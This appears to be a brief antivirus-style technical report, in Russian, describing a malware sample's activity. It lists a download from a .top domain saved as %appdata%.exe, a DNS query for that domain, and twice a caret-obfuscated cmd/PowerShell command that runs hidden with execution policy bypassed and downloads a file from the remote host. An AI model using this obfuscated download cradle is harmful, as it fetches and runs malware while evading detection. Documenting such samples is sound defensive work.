Техническая информация
- http://zussipussicscds.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "PO^weRsh^ELL.Ex^e -e^Xe^c^uTI^o^np^O^l^i^C^y B^ypAS^S -^N^oPRofI^L^E ^-^wiN^d^O^WsTyLe^ HIDD^en^ (NE^W-obJec^T^ S^Y^s^Te^m.NeT.wE^bclI^EN^T).^D^Ow^N^LoaDFilE^(^'http://zussipussi...
- DNS ASK zu####ussicscds.top
- '<SYSTEM32>\cmd.exe' /c "PO^weRsh^ELL.Ex^e -e^Xe^c^uTI^o^np^O^l^i^C^y B^ypAS^S -^N^oPRofI^L^E ^-^wiN^d^O^WsTyLe^ HIDD^en^ (NE^W-obJec^T^ S^Y^s^Te^m.NeT.wE^bclI^EN^T).^D^Ow^N^LoaDFilE^(^'http://zussipussi...' (со скрытым окном)